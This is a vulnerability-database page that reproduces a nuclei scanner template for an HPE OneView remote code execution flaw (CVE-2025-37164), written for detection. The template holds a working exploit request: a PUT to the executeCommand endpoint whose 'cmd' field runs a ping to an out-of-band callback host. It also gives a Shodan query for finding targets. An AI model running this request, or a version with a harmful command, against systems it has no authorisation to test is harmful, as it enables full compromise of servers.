Lucene search
K

HPE OneView - Remote Code Execution

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

Hewlett Packard Enterprise OneView has a remote code execution vulnerability; update.

Related
Refs
Code
id: CVE-2025-37164

info:
  name: HPE OneView - Remote Code Execution
  author: DhiyaneshDk,garciaizcoa
  severity: critical
  description: |
    HPE OneView contains a remote code execution vulnerability, letting remote attackers execute arbitrary code.
  impact: |
    Remote attackers can execute arbitrary code, potentially leading to full system compromise.
  remediation: |
    Update to the latest version.
  reference:
    - https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
  metadata:
    verified: true
    max-request: 2
    shodan-query: html:"HPE" html:"OneView"
  tags: cve,cve2025,hpe,oneview,rce,vkev,kev

http:
  - raw:
      - |
        GET /rest/version HTTP/1.1
        Host: {{Hostname}}

      - |
        PUT /rest/id-pools/executeCommand HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-API-Version: {{apiversion}}
        Accept-Encoding: gzip
        {
        "cmd":"ping -c 2 {{interactsh-url}}",
        "result":0
        }

    extractors:
      - type: json
        part: body
        name: apiversion
        internal: true
        json:
          - '.currentVersion'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ExecutableCommand"

      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022056d7db495c46aa418e0207e1e11512d4f7da23e084142b7306131b3b37130d52022100fcfa6cd6c9ef141dcbd5e00d58ba5a623e378e20f0315b705f12f4301d5b4cce:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.19.8 - 10
EPSS0.89733
SSVC
11